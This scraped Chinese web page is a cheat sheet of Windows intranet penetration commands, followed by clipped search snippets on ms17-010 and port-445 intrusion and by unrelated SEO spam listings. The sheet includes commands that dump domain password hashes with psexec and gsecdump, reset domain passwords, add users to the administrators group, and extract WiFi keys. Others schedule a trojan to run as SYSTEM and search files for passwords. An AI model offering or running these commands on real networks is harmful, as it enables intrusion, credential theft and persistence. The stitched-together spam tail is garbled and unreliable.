内网渗透命令大全

作者&投稿:策建 (若有异议请与网页底部的电邮联系)
~ 1. 域常用操作命令:

net group /domain //列出所有域用户组

net group qq_group /domain //显示qq_group域组成员

net group qq_group /del /domain //删除qq_group域组

net group qq_group qq /del /domain //移除qq_group组中成员qq

net group qq_group /add /domain //增加新域组

net group "domain admins" /domain //列出域管理员

net group "enterprise admins" /domain //列出企业管理员

net localgroup administrators /domain //获取域内置administrators组成员

net group "domain controllers" /domain //列出域控制器

net group "domain computers" /domain //列出所有域成员计算机

net user /domain //显示所有域用户

net user someuser /domain //查看特定账户someuser信息

net accounts /domain //查看域密码策略

nei view /domain //检查域数量和列表

net view /domain:testdomain //查看testdomain域中的计算机

nltest /domain_trusts //查看域信任关系

net user domain-admin /domain //查看管理员账户详情

net config Workstation //查看当前工作站所属域

net time /domian //检查主域服务器时间

echo %logonserver% //显示登录服务器的计算机名

net time \\192.168.1.1 //查询远程主机时间

net use \\IP\ipc$ password /user:username@domain //创建IPC会话

net view \\ dc2.backlion.com //查看域控共享情况

dir \\ dc2.backlion.com\SYSVOL /s /a > sysvol.txt //列出sysvol日志

xcopy \\ dc2.backlion.com\sysvol.txt sysvol.txt /i /e /c //远程拷贝sysvol日志

net user /domain bk bk123 //修改域用户密码

net localgroup administartors SEZKL\backlion /add //将SEZKL域用户添加至administrators组

mstsc /admin //使用远程桌面访问控制台会话

gpupdate/force //更新域策略

psexec \\192.168.1.3 -u administrator -p bk1234 -c gsecdump.exe -u //从域服务器导出hash值

gsecdump -a //获取域管理员登录hash值

tasklist /S ip /U domain\username /P /V //查看远程计算机进程

2. 基本内网渗透命令:

ipconfig/all //显示IP地址信息

ipconfig /release //释放地址

ipconfig /renew //重新获取IP地址

whoami //显示当前账号权限

whoami/all //查看SID值

systeminfo //查看系统及补丁信息

tasklist /svc //列出进程

taskkill /im 进程名称(cmd) //结束指定进程

taskkill /pid 进程码 -t -f //结束进程及其所有子进程

wmic qfe get hotfixid //查看已安装补丁

wmic qfe list full /format:htable > hotfixes.htm //详细补丁信息

wmic qfe //查询补丁信息及下载链接

ping hostname //显示主机名的IP

net start //查看当前运行服务

net user //查看本地组用户

net localhroup administrators //查看本机管理员组成员

net user //查看会话

net session //查看当前会话

net share //查看共享路径

wmic share get name,path //获取共享路径

wmic nteventlog get path,filename,writeable //查询系统日志文件位置

net use \\IP\ipc$ password /user:username //建立IPC会话

net use z: \\192.168.1.1 //建立映射至本地Z盘

net time \\172.16.16.2 //查询共享主机时间

at \\172.16.16.2 13:50 c:\windows\2009.exe //在共享主机上执行命令

netstat -ano //查看开放端口

netstat -an | find “3389” //查找3389端口

net accounts //查看本地密码策略

nbtstat –A ip //查询NetBIOS信息

net view //查看机器注释或活动状态列表

echo %PROCESSOR_ARCHITECTURE% //查看系统架构(32/64位)

set //查看系统环境变量

net start //查看当前运行服务

wmic service list brief //查看进程服务

wmic process list brief //查看进程

wmic startup list brief //查看开机启动程序信息

wmic product list brief //查看安装程序及版本信息

wmic startup list full //识别开机启动程序

wmic process where(description="mysqld.exe") >> mysql.log //获取软件安装路径

for /f "skip=9 tokens=1,2 delims=:" %i in ('ne

tsh wlan showprofiles') do @echo %j | findstr

-i -v echo | netsh wlan show profiles %jkey=clear //获取WiFi密码

if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell) //检查是否支持PowerShell

qwinsta //查看登录情况

schtasks.exe /Create /RU"SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "c:/muma.ex e" /ED 2017/4/7 //添加计划任务

3. 内网网络常用命令:

tracert IP //路由跟踪

route print //打印路由表

arp -a //列出网段内活跃IP地址

arp -s (ip + mac) //绑定MAC与IP地址

arp -d (ip + mac) //解绑MAC与IP地址

nbtscan -r 192.168.16.0/24 //扫描整个网络

netsh firewall show config //查看防火墙策略

netsh firewall show state //查看防火墙状态

for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i"ttl" //批量扫描内网存活主机

4. 敏感数据和目录:

dir /b/s config.* //查看所有config开头文件

findstr /si password *.xml *.ini *.txt //搜索包含password关键字的文件

findstr /si login *.xml *.ini *.txt //搜索包含login关键字的文件

copy con 创建命令:创建批处理或脚本并输入命令

copy con ftp.bat //创建ftp.bat批处理

copy con test.vbs //创建test.vbs脚本

5. dsquery AD查询工具:

dsquery user domainroot -limit 65535 && net user /domain //列出域内所有用户名

dsquery server -domain super.com | dsget server -dnsname -site //搜索域内所有域控制器及DNS主机名、站点名称

dsquery contact //寻找目录中的联系人

dsquery subnet //列出域内网段划分

query user //查询在线用户

dsquery group && net group /domain //列出域内分组

dsquery ou //列出域内组织单位

dsquery server && net time /domain //列出域内域控制器

dsquery site -o rdn //搜索域内所有站点名称

dsquery group dc=super,dc=com |more //搜索特定域组

psloggedon.exe //查询登录主机及用户

netsess.exe //查询主机名和用户

reg query "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\TERMINAL SERVERCLIENT\DEFAULT" //获取mstsc登录记录

6. DOS常用快捷命令:

mspaint //画图工具

calc //计算器

notepad //记事本

taskmgr //任务管理器

osk //屏幕键盘

gpedit.msc //组策略

services.msc //本地服务

compmgmt.msc //计算机管理

devmgmt.msc //设备管理器

winver //查看系统版本

magnify //放大镜

eventvwr //事件查看器

Regedit //打开注册表

resmon //资源监视器

WMIC BIOS get releasedate //查看生产日期

mstsc -f //远程连接全屏模式


kali命令大全
常用于端口扫描和操作系统识别。10. 漏洞利用和安全测试: ettercap 和 Metasploit 可用于ARP欺骗、DNS欺骗以及漏洞利用。11. 其他工具: 包括 whois, ping, dig, 和网络嗅探工具如 dsniff 和 driftnet。以上是Kali Linux中部分命令的简要介绍,熟练掌握这些命令可以大大提高系统管理和渗透测试的效率。

内网渗透之ms17-010
进一步利用的一些命令 实际测试发现这种session非常稳定。不会轻易go die 实际测试server 2003的ms17-010时,有时候多次执行后msf就接收不到session,而且ms17-010利用时,脆弱的server 2003非常容易蓝屏。 所以笔者选择一种稳定可靠一些的办法。 先通过ms17_010_commend模块执行系统命令添加用户至管理...

如何利用445端口进行入侵渗透 445端口入侵原因详细解析
1 首先,我们先建立一个空会话(当然,这需要目标开放 ipc$ )命令: net use \\\\ip\\ipc$ "" \/user:""注意:上面的命令包括四个空格, net 与 use 中间有一个空格, use 后面一个,密码左右各一个空格。2 查看远程主机的共享资源 命令: net view \\\\ip 解释:前提是建立了空连接后,用此...

如何对网站进行渗透测试和漏洞扫描
1、渗透测试 (penetration test)并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏...

渗透测试会用到哪些工具?网络安全基础
1、Invicti Pro invicti是一种自动化但完全可配置的web应用程序安全扫描程序,使您能够扫描网站、web应用程序和web服务,并识别安全漏洞。2、BurpSuite 与web浏览器配合使用,可发现给定APP的功能和安全问题,是发起定制攻击的基础。目前,免费版本功能很有限,但付费版本提供全面的网络爬取和扫描功能、多攻击...

入侵网站需要什么步骤
或者跟据网页脚本上的漏洞进行网页渗透。第二步的主要目的就是为了获得一个可以在目标服务器上执行一定命令的权限,这也是最难的一步。第三步:权限提升 如果只是为了从服务器上拿些东西,或者修改服务器上的一些文件,利用第二步获得权限可能已经足够,但是如果遇到细心的管理员进行了严格的权限管理,或者...

网络渗透是什么意思,怎么学习,本人0基础
只要是人写的代码就有漏洞,没有不存在漏洞的系统,只有没有发现漏洞的系统。这个行业目前是形势很好,算是朝阳产业了。这对于网络安全行业的学习者和从业者都是一个好事,安全是被冷落了很多年,现在可以算是开始繁荣的阶段。这个领域现在人才缺口非常大,未来会更大。所以如果有志于从事这个领域的年轻人...

渗透测试工具的网络扫描工具
网络扫描是渗透测试的第一步,其目的在于发现目标的操作系统类型、开放端口等基本信息,为后续的扫描工作做基础。事实上,利用操作系统本身的一些命令如ping、telnet、nslookup等也可以对目标的信息进行判断,但是利用专业的工具可以给出更加全面和准确的判断。 SuperScan是一款功能强大的端口扫描软件,其主要...

渗透测试学习些啥呀?
渗透测试需要的基础技能必须有网络基础、编程基础、数据库基础、操作系统等基本技能。学习的话可以从html、css、js、编程语言、协议包分析、网络互联原理、数据库语法等进入,学习了这些基础技能之后,就可以进行渗透测试的深入学习了,如web方面的学习OWASP TOP 10漏洞挖掘、主机系统服务漏洞检测、App漏洞检测...

web渗透是什么?
或者看是否有上传文件的地方,上传一句话木马,再用菜刀链接,拿到数据库并可执行cmd命令,可继续上大马...思路很多,很多时候成不成功可能就是一个思路的问题,技术可以不高,思路一定得骚。信息收集 信息收集是整个流程的重中之重,前期信息收集的越多,Web渗透的成功率就越高。DNS域名信息:通过url获...

万载县13450652038: 常用的网络命令有哪些? -
池府格列: 原发布者:鸿鑫科技 八个cmd常用网络命令(黑客常用)一、ping它是用来检查网络是否通畅或者网络连接速度的命令.作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上...

万载县13450652038: 局域网渗透定义,简单好理解一点的 -
池府格列: 相对来说 网上的资料少之又少 很少有人对内网渗透写出一些详细的资料以供同行们参考 今天在这 只是大致的讲一下内网的一些知识. 首先,我们会在什么情况下遇见内网?如果你的目标只局限于一个小WEB,那你完全不用考虑内网了.但是...

万载县13450652038: 怎样用dos命令入侵局域网
池府格列: 一,ping 二,nbtstat 三,netstat 四,tracert 五,net 六,at 七,ftp 八,telnet 把这些命令学下就行了,主要多尝试不怕失败才能提高,不过要以学习研究为目的.

万载县13450652038: 怎么入侵局域网 -
池府格列: 在局域网内可以对路由器进行漏洞攻击,掌控整个局域网.如果是在局域网外,需要先攻击局域网内任意一台主机,然后进行端口转发,再对整个局域网进行渗透.

万载县13450652038: 如何越过网段进行内网渗透? -
池府格列: 首先你要知道跟你同一个局域网的用户是否开启了防火墙或者禁止了同一局域网的共享和安全!如果对方禁用了共享,那你是进不去的,只有用歪门邪道进去了方法如下一、 在该机创建一个批处理文件,内容如下:net user admin /addnet ...

万载县13450652038: 如何利用wifi局域网渗透安卓手机 -
池府格列: 以前在安全论坛看过,拿到密码后,破路由器,路由进了,修改DNS服务器,然后自己架设DNS,换之.然后通过自己的DNS把用户引导到自己已经假设好的钓鱼网站上,钓鱼网站可以伪造成知名站点,腾讯、百度、淘宝.安全思路,仅供学习.

万载县13450652038: net命令怎么用?? -
池府格列: NET命令大全 (1)NET VIEW 作 用:显示域列表、计算机列表或指定计算机的共享资源列表. 命令格式:net view [\\computername | /domain[:domainname]] 参数介绍: (1)键入不带参数的net view显示当前域的计算机列表. (2)\\...

万载县13450652038: linux常用命令有哪些? -
池府格列: linux常用命令有pwd命令、cd命令、ls命令、cat命令、grep命令、touch命令、cp命令、mv命令、rm命令、rmdir命令等.linux常用命令: 1、 pwd命令 该命令的英文解释为print working directory(打印工作目录).输入pwd命令,Linux会输出当...

万载县13450652038: 如何使用metasploit进行内网渗透详细过程 -
池府格列: 可以,各种模块配合,只是很少有人用msf渗透外网,一般都是web应用端,然后局域网.

万载县13450652038: telnet都有哪些命令? -
池府格列: escape; 在Telnet中是客户机的一个特殊的命令模式,它的默认值是"Ctrl-]".但要注意不要与键盘上的Esc键混淆,我们可以设定"escape"为任意某个字符,只是对Telnet来说以为着该字符不可能再被传送到远程主机上,而Esc键是一非打...

本站内容来自于网友发表,不代表本站立场,仅表示其个人看法,不对其真实性、正确性、有效性作任何的担保
相关事宜请发邮件给我们
© 星空见康网